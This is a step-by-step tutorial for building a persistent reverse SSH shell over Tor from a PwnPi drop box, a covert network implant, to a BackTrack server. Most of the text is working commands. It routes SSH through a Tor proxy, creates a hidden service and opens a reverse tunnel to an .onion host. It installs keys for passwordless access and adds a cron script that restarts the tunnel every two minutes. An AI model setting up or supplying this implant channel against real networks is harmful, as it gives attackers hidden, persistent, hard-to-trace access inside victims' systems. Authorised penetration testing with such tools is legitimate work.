tor reverse shell

Client Side

PwnPi v3.0 comes with Tor preinstalled. Just type apt-get update && apt-get upgrade to get the latest version.

Download and compile connect.c. It is used as the proxy command for OpenSSH.

wget https://savannah.gnu.org/maintenance/connect.c
gcc -o /usr/local/bin/connect connect.c
chmod 755 /usr/local/bin/connect
chown root.root /usr/local/bin/connect

Configure OpenSSH to use the proxy for .onion addresses.

nano /etc/ssh/ssh_config
Add these two lines at the end of the file:

Host *.onion
ProxyCommand /usr/local/bin/connect -S localhost:9050 %h %p

Enable Tor autostart:
update-rc.d tor enable

Server Side

In this example I'm using BackTrack 5 R3 as the server. It is also running Tor and, of course, OpenSSH.

First create a Tor hidden service for port 22 (SSH).
Open /etc/tor/torrc (nano /etc/tor/torrc) and add the following at the end of the file:

HiddenServiceDir /var/lib/tor/ssh/
HiddenServicePort 22 127.0.0.1:22

When done, restart Tor (/etc/init.d/tor restart). A hidden service should now have been created. Check it by running cat /var/lib/tor/ssh/hostname. If the hostname file is missing, something went wrong.

Also do: echo 1 > /proc/sys/net/ipv4/ip_forward

Reverse shell

revpwnscript

Put your onion hostname into this command line:

ssh -NR 3300:localhost:22 root@<youronionhostnamehere>.onion

Save this line in a file named /root/reversepwn. It is needed for the autorun on boot later on.

To automate the login and grant the PwnPi access to the SSH server, do this on your PwnPi:

ssh-keygen -t rsa

cat ~/.ssh/*.pub | ssh root@<youronionhostnamehere>.onion 'umask 077; mkdir -p .ssh; cat >> .ssh/authorized_keys'

I made a lazy script to check whether the proxy is running:

#!/bin/sh
# Check whether the connect proxy (spawned by ssh's ProxyCommand) is running;
# if it is not, start the reverse tunnel again.
SERVICE=/usr/local/bin/connect
LOG=/root/reverseonion.log
if pgrep -f "$SERVICE" > /dev/null
then
    echo "$SERVICE service running, everything is fine"
    echo "$(date): service running" >> "$LOG"
else
    echo "$SERVICE is not running"
    echo "starting service"
    echo "$(date): service not running - starting!" >> "$LOG"
    # run the tunnel in the background so the cron job itself returns
    nohup bash /root/reversepwn > /dev/null 2>&1 &
fi

Save it to /root/check.sh and add a cron job via crontab -e (every two minutes):

*/2 * * * * bash /root/check.sh

If everything worked fine, it should look something like this:

[screenshot: backtrack con est]

<eof> vers. 0,1

related links:
http://www.irongeek.com/i.php?page=security/raspberry-pi-recipes
http://www.schlittermann.de/doc/ssh
http://www.securitygeneration.com/security/reverse-ssh-over-tor-on-the-pwnie-express/
http://nesit.org/minipwner-reverse-ssh-over-tor/